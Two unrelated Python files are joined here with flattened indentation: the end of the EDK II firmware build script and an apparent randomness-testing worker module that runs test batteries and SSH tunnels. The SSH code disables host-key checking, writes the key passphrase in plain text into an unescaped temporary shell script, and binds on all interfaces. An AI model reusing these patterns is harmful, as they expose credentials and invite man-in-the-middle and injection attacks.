EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache is None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase is None:
Utils.gDependencyDatabase = {}
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
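# Illustrative behaviour of ParseDefines (example values only, not from the original file):
#   ParseDefines(['SECURE_BOOT_ENABLE', 'BUILD_NUMBER=0042'])
#     -> {'SECURE_BOOT_ENABLE': 'TRUE', 'BUILD_NUMBER': '0042'}
# A name given without '=' defaults to "TRUE"; otherwise the value is taken verbatim (stripped).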
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
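# Illustrative outputs of LogBuildTime (example values only, not from the original file):
#   LogBuildTime(3725)  -> '01:02:05'
#   LogBuildTime(90061) -> '01:01:01, 1 day(s)'
#   LogBuildTime(0)     -> None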
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'IPF', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
                      help="ARCHS is one of: IA32, X64, IPF, ARM, AARCH64 or EBC, and overrides target.txt's TARGET_ARCH definition. To specify more than one arch, repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
        help="Build the platform using multiple threads. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When the value is 0, the tool automatically detects the number of "\
             "processor threads; a value of 1 disables multi-threaded build, and a value greater than 1 specifies the number of threads to use.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD', 'LIBRARY', 'FLASH', 'DEPEX', 'BUILD_FLAGS', 'FIXED_ADDRESS', 'HASH', 'EXECUTION_ORDER'], dest="ReportType", default=[],
                      help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
                      "To specify more than one flag, repeat this option on the command line. The default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS].")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
                      help="Specify the option used to parse EDK UNI files. Must be one of: [-c, -s]. -c is for EDK framework UNI files, and -s is for EDK UEFI UNI files. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
    Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus on a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
(Opt, Args) = Parser.parse_args()
return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile is not None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one target is not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
#MyBuild.DumpBuildData()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError as X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning as X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to edk2-devel@lists.01.org for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
rtt_worker.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Dusan Klinec, ph4r05, 2018
# pip install shellescape sarge
import logging
import signal
import threading
import time
import sys
import os
import random
import socket
import typing
import shutil
import tempfile
import paramiko
import sshtunnel
from shlex import quote
import shellescape
from sarge import Capture, Feeder, run
from . import rtt_sftp_conn
from . import rtt_utils
logger = logging.getLogger(__name__)
SARGE_FILTER_INSTALLED = False
RTT_BATTERIES = {
'Dieharder': 'dieharder',
'NIST Statistical Testing Suite': 'nist_sts',
'TestU01 Alphabit': 'tu01_alphabit',
'TestU01 Block Alphabit': 'tu01_blockalphabit',
'TestU01 Crush': 'tu01_crush',
'TestU01 Rabbit': 'tu01_rabbit',
'TestU01 Small Crush': 'tu01_smallcrush',
}
def job_battery_to_experiment(bat):
for keys in RTT_BATTERIES:
if RTT_BATTERIES[keys] == bat:
return keys
raise ValueError('Key not found: %s' % bat)
def experiment_battery_to_job(bat):
return RTT_BATTERIES[bat]
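# Illustrative round trip (example values only, not part of the original module):
#   experiment_battery_to_job('TestU01 Rabbit')  -> 'tu01_rabbit'
#   job_battery_to_experiment('tu01_rabbit')     -> 'TestU01 Rabbit'
# job_battery_to_experiment raises ValueError for an unknown job identifier.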
def try_fnc(fnc):
try:
return fnc()
except:
pass
class SargeLogFilter(logging.Filter):
    """Filters out debug-level logs generated by sarge output capture; they are far too verbose."""
def __init__(self, name="", *args, **kwargs):
self.namex = name
logging.Filter.__init__(self, *args, **kwargs)
def filter(self, record):
if record.levelno != logging.DEBUG:
return 1
try:
# Parse messages are too verbose, skip.
if record.name == "sarge.parse":
return 0
# Disable output processing message - length of one character.
msg = record.getMessage()
if "queued chunk of length 1" in msg:
return 0
return 1
except Exception as e:
logger.error("Exception in log filtering: %s" % (e,), exc_info=e)
return 1
def install_sarge_filter():
"""
Installs Sarge log filter to avoid long 1char debug dumps
:return:
"""
global SARGE_FILTER_INSTALLED
if SARGE_FILTER_INSTALLED:
return
for handler in logging.getLogger().handlers:
handler.addFilter(SargeLogFilter("hnd"))
logging.getLogger().addFilter(SargeLogFilter("root"))
SARGE_FILTER_INSTALLED = True
def sarge_sigint(proc, sig=signal.SIGTERM):
"""
Sends sigint to sarge process
:return:
"""
proc.process_ready.wait()
p = proc.process
if not p: # pragma: no cover
raise ValueError("There is no subprocess")
p.send_signal(sig)
def escape_shell(inp):
"""
Shell-escapes input param
:param inp:
:return:
"""
try:
inp = inp.decode("utf8")
except:
pass
try:
return shellescape.quote(inp)
except:
pass
    return quote(inp)
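# Rough behaviour sketch (example values only; exact quoting comes from shellescape / shlex):
#   escape_shell("file name.bin") -> "'file name.bin'"
#   escape_shell(b"plain")        -> 'plain'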
class AsyncRunner:
def __init__(self, cmd, args=None, stdout=None, stderr=None, cwd=None, shell=True, env=None):
self.cmd = cmd
self.args = args
self.on_finished = None
self.on_output = None
self.on_tick = None
self.no_log_just_write = False
self.log_out_during = True
self.log_out_after = True
self.stdout = stdout
self.stderr = stderr
self.cwd = cwd
self.shell = shell
self.env = env
self.preexec_setgrp = False
self.using_stdout_cap = True
self.using_stderr_cap = True
self.ret_code = None
self.out_acc = []
self.err_acc = []
self.feeder = None
self.proc = None
self.is_running = False
self.was_running = False
self.terminating = False
self.thread = None
def run(self):
try:
self.run_internal()
except Exception as e:
self.is_running = False
logger.error("Unexpected exception in runner: %s" % (e,), exc_info=e)
finally:
self.was_running = True
def __del__(self):
self.deinit()
def deinit(self):
rtt_utils.try_fnc(lambda: self.feeder.close())
if not self.proc:
return
if self.using_stdout_cap:
rtt_utils.try_fnc(lambda: self.proc.stdout.close())
if self.using_stderr_cap:
rtt_utils.try_fnc(lambda: self.proc.stderr.close())
rtt_utils.try_fnc(lambda: self.proc.close())
def drain_stream(self, s, block=False, timeout=0.15):
ret = []
while True:
rs = s.read(-1, block, timeout)
if not rs:
break
ret.append(rs)
return ret
def run_internal(self):
def preexec_function():
os.setpgrp()
cmd = self.cmd
if self.shell:
args_str = (
" ".join(self.args) if isinstance(self.args, (list, tuple)) else self.args
)
if isinstance(cmd, (list, tuple)):
cmd = " ".join(cmd)
if args_str and len(args_str) > 0:
cmd += " " + args_str
else:
if self.args and not isinstance(self.args, (list, tuple)):
                raise ValueError("Non-shell mode requires args to be a list or tuple")
if self.args:
cmd += self.args
self.using_stdout_cap = self.stdout is None
self.using_stderr_cap = self.stderr is None
self.feeder = Feeder()
logger.debug("Starting command %s in %s" % (cmd, self.cwd))
run_args = {}
if self.preexec_setgrp:
run_args['preexec_fn'] = preexec_function
p = run(
cmd,
input=self.feeder,
async_=True,
stdout=self.stdout or Capture(timeout=0.1, buffer_size=1),
stderr=self.stderr or Capture(timeout=0.1, buffer_size=1),
cwd=self.cwd,
env=self.env,
shell=self.shell,
**run_args
)
self.proc = p
self.ret_code = 1
self.out_acc, self.err_acc = [], []
out_cur, err_cur = [""], [""]
def process_line(line, is_err=False):
dst = self.err_acc if is_err else self.out_acc
dst.append(line)
if self.log_out_during:
if self.no_log_just_write:
dv = sys.stderr if is_err else sys.stdout
dv.write(line + "\n")
dv.flush()
else:
logger.debug("Out: %s" % line.strip())
if self.on_output:
self.on_output(self, line, is_err)
def add_output(buffers, is_err=False, finish=False):
buffers = [x.decode("utf8") for x in buffers if x is not None and x != ""]
lines = [""]
if not buffers and not finish:
return
dst_cur = err_cur if is_err else out_cur
for x in buffers:
clines = [v.strip("\r") for v in x.split("\n")]
lines[-1] += clines[0]
lines.extend(clines[1:])
nlines = len(lines)
dst_cur[0] += lines[0]
if nlines > 1:
process_line(dst_cur[0], is_err)
dst_cur[0] = ""
for line in lines[1:-1]:
process_line(line, is_err)
if not finish and nlines > 1:
dst_cur[0] = lines[-1] or ""
if finish:
cline = dst_cur[0] if nlines == 1 else lines[-1]
if cline:
process_line(cline, is_err)
try:
while len(p.commands) == 0:
time.sleep(0.15)
logger.debug("Program started, progs: %s" % len(p.commands))
if p.commands[0] is None:
self.is_running = False
self.was_running = True
logger.error("Program could not be started")
return
self.is_running = True
self.on_change()
out = None
err = None
while p.commands[0] and p.commands[0].returncode is None:
if self.using_stdout_cap:
out = p.stdout.read(-1, False)
add_output([out], is_err=False)
if self.using_stderr_cap:
err = p.stderr.read(-1, False)
add_output([err], is_err=True)
if self.on_tick:
self.on_tick(self)
p.commands[0].poll()
if self.terminating and p.commands[0].returncode is None:
logger.debug("Terminating by sigint %s" % p.commands[0])
sarge_sigint(p.commands[0], signal.SIGTERM)
sarge_sigint(p.commands[0], signal.SIGINT)
logger.debug("Sigint sent")
logger.debug("Process closed")
# If there is data, consume it right away.
if (self.using_stdout_cap and out) or (self.using_stderr_cap and err):
continue
time.sleep(0.15)
logger.debug("Runner while ended")
p.wait()
self.ret_code = p.commands[0].returncode if p.commands[0] else -1
if self.using_stdout_cap:
try_fnc(lambda: p.stdout.close())
add_output(self.drain_stream(p.stdout, True), finish=True)
if self.using_stderr_cap:
try_fnc(lambda: p.stderr.close())
add_output(self.drain_stream(p.stderr, True), is_err=True, finish=True)
self.was_running = True
self.is_running = False
self.on_change()
logger.debug("Program ended with code: %s" % self.ret_code)
logger.debug("Command: %s" % cmd)
if self.log_out_after:
logger.debug("Std out: %s" % "\n".join(self.out_acc))
logger.debug("Error out: %s" % "\n".join(self.err_acc))
except Exception as e:
self.is_running = False
logger.error("Exception in async runner: %s" % (e,))
finally:
self.was_running = True
rtt_utils.try_fnc(lambda: self.feeder.close())
rtt_utils.try_fnc(lambda: self.proc.close())
if self.on_finished:
self.on_finished(self)
def on_change(self):
pass
def shutdown(self):
if not self.is_running:
return
self.terminating = True
time.sleep(1)
# Terminating with sigint
logger.info("Waiting for program to terminate...")
while self.is_running:
time.sleep(0.1)
logger.info("Program terminated")
self.deinit()
def start(self):
install_sarge_filter()
self.thread = threading.Thread(target=self.run, args=())
self.thread.setDaemon(False)
self.thread.start()
self.terminating = False
self.is_running = False
while not self.is_running and not self.was_running:
time.sleep(0.1)
return self
def get_rtt_runner(rtt_args, cwd=None):
rtt_env = {'LD_LIBRARY_PATH': rtt_utils.extend_lib_path(cwd)}
async_runner = AsyncRunner(rtt_args, cwd=cwd, shell=False, env=rtt_env)
async_runner.log_out_after = False
async_runner.preexec_setgrp = True
return async_runner
def get_booltest_rtt_runner(rtt_args, cwd=None):
async_runner = AsyncRunner(rtt_args, cwd=cwd, shell=False)
async_runner.log_out_after = False
async_runner.preexec_setgrp = True
return async_runner
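# A minimal usage sketch of AsyncRunner (not part of the original module; the
# command and log messages are hypothetical and only illustrate the API defined
# above: start() spawns the sarge-backed worker thread, on_output receives each
# decoded output line, and ret_code is populated once the child exits).
def _example_async_runner_usage():
    runner = AsyncRunner('echo hello', shell=True)
    runner.on_output = lambda r, line, is_err: logger.info('child output: %s', line)
    runner.start()                    # returns once the subprocess is up (or already done)
    while runner.is_running:          # poll until the child has finished
        time.sleep(0.1)
    logger.info('child exit code: %s', runner.ret_code)
    return runner.out_acc             # accumulated stdout lines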
class SSHForwarder:
def __init__(self, ssh_params: rtt_sftp_conn.SSHParams, remote_server: str, remote_port: int, local_port=None):
self.ssh_params = ssh_params
self.remote_server = remote_server
self.remote_port = remote_port
self.local_port = local_port
def start(self):
raise ValueError('Not implemented')
def shutdown(self):
raise ValueError('Not implemented')
class SSHForwarderPython(SSHForwarder):
def __init__(self, ssh_params: rtt_sftp_conn.SSHParams, remote_server: str, remote_port: int, local_port=None):
super().__init__(ssh_params, remote_server, remote_port, local_port)
self.is_running = False
self.terminating = False
self.thread = None
def run(self):
logger.info("Establishing SSH tunnel...")
local_args = {} if not self.local_port else {'local_bind_address': ('0.0.0.0', self.local_port)}
with sshtunnel.open_tunnel(
(self.ssh_params.host, self.ssh_params.port),
ssh_username=self.ssh_params.user,
ssh_pkey=self.ssh_params.pkey_file,
ssh_private_key_password=self.ssh_params.pkey_pass,
remote_bind_address=(self.remote_server, self.remote_port),
**local_args
) as tunnel:
self.local_port = tunnel.local_bind_port
self.is_running = True
logger.info("SSH tunnel established, port: %s" % self.local_port)
while not self.terminating:
time.sleep(0.5)
self.is_running = False
logger.info("Closing SSH tunnel")
def start(self):
self.thread = threading.Thread(target=self.run, args=())
self.thread.setDaemon(False)
self.thread.start()
self.terminating = False
self.is_running = False
while not self.is_running:
time.sleep(0.1)
return self
def shutdown(self):
if not self.is_running:
return
self.terminating = True
time.sleep(1)
# Terminating with sigint
logger.info("Waiting for ssh tunnel to terminate...")
while self.is_running:
time.sleep(0.1)
def bind_random_port():
for _ in range(5000):
port = random.randrange(20000, 65535)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(('127.0.0.1', port))
return s, port
except socket.error as e:
s.close()
raise ValueError('Binding took too long')
def try_to_connect(host, port, timeout=15):
tstart = time.time()
while True:
if time.time() - tstart > timeout:
raise ValueError('Could not connect in time')
s = socket.socket()
s.settimeout(5)
try:
s.connect((host, port))
return s
except socket.error as exc:
time.sleep(0.1)
continue
class SSHForwarderLinux(SSHForwarder):
def __init__(self, ssh_params: rtt_sftp_conn.SSHParams, remote_server: str, remote_port: int, local_port=None):
super().__init__(ssh_params, remote_server, remote_port, local_port)
self.on_bind_error = None
self.do_setsid = True
self.reservation_socket = None
self.runner = None # type: typing.Optional[AsyncRunner]
self.ssh_passwd_asked = False
self.ssh_passwd_entered = False
self.bind_error = False
self.ask_pass_path = None
self.first_tick = None
self.script_path = None
self.pid_path = None
def __del__(self):
logger.info("SSH shutdown on delete (dirty)")
self.shutdown()
def create_runner(self):
if self.local_port is None:
self.reservation_socket, self.local_port = bind_random_port()
logger.info("Reserving random local port: %s" % self.local_port)
args = [
'-i', '\'%s\'' % self.ssh_params.pkey_file,
'-L', '%s:%s:%s' % (self.local_port, self.remote_server, self.remote_port),
'-N',
'-oLogLevel=error',
'-oStrictHostKeyChecking=no',
'-oUserKnownHostsFile=/dev/null',
'-o ConnectTimeout=30',
'-p', '%s' % self.ssh_params.port,
'\'%s\'@%s' % (self.ssh_params.user, self.ssh_params.host),
]
args_str = ' '.join(args)
cmd = 'ssh %s' % args_str
if self.do_setsid:
self.create_shell_run_script(cmd)
cmd = 'setsid bash %s' % self.script_path
env = {
'DISPLAY': ':0',
'SSH_ASKPASS': self.ask_pass_path
}
logger.info("Creating runner with: %s, env: %s" % (cmd, env))
self.runner = AsyncRunner(cmd, shell=True, env=env)
self.runner.on_output = self.on_ssh_line
self.runner.on_tick = self.on_ssh_tick
self.runner.on_finished = self.on_ssh_finish
def on_ssh_line(self, runner, line: str, is_error):
low = line.lower().strip()
if low.startswith('enter pass'):
self.ssh_passwd_asked = True
if low.startswith('bind: address al'):
self.bind_error = True
if self.on_bind_error:
self.on_bind_error()
def on_ssh_tick(self, runner):
if not self.first_tick:
self.first_tick = time.time()
if time.time() - self.first_tick > 10:
self.try_delete_shell_script()
if self.ssh_passwd_asked and not self.ssh_passwd_entered:
self.runner.feeder.feed(self.ssh_params.pkey_pass)
self.runner.feeder.feed("\n")
self.ssh_passwd_entered = True
logger.info("Key password entered")
def on_ssh_finish(self, runner):
logger.info("SSH tunnel finished")
self.try_delete_shell_script()
def create_shell_run_script(self, cmd):
old_mask = os.umask(0)
temp = tempfile.NamedTemporaryFile()
self.script_path = temp.name
temp.close()
temp = tempfile.NamedTemporaryFile()
self.pid_path = temp.name
temp.close()
logger.info('Creating SSH run script: %s, pid file: %s, cmd: %s'
% (self.script_path, self.pid_path, cmd))
with open(os.open(self.script_path, os.O_CREAT | os.O_WRONLY, 0o700), 'w') as fh:
fh.write('#!/bin/bash\n')
fh.write('%s &\n' % cmd)
fh.write('echo $! > %s\n' % self.pid_path)
os.umask(old_mask)
def create_shell_script(self):
old_mask = os.umask(0)
temp = tempfile.NamedTemporaryFile()
self.ask_pass_path = temp.name
temp.close()
logger.info('Creating SSH ask script: %s' % self.ask_pass_path)
with open(os.open(self.ask_pass_path, os.O_CREAT | os.O_WRONLY, 0o700), 'w') as fh:
fh.write('#!/bin/bash\n')
fh.write('echo "%s"\n' % self.ssh_params.pkey_pass)
fh.write('/bin/rm "%s" >/dev/null 2>/dev/null\n' % self.ask_pass_path)
os.umask(old_mask)
def try_delete_shell_script(self):
try:
if self.ask_pass_path and os.path.exists(self.ask_pass_path):
logger.info("Deleting ASK pass script %s" % self.ask_pass_path)
os.unlink(self.ask_pass_path)
self.ask_pass_path = None
except:
pass
def start(self):
self.create_shell_script()
self.create_runner()
if self.reservation_socket:
self.reservation_socket.close()
logger.info("Reservation socket closed, race begins...")
self.runner.start()
# Connection test
try:
logger.info("SSH started, waiting for port availability")
s = try_to_connect('127.0.0.1', self.local_port, 60)
s.close()
time.sleep(1)
except Exception as e:
logger.error('Could not start SSH port forwarding in the given time limit, aborting execution')
self.runner.shutdown()
raise ValueError('Could not start SSH tunneling')
def shutdown(self):
logger.info("Shutting down SSH forwarder")
if self.pid_path:
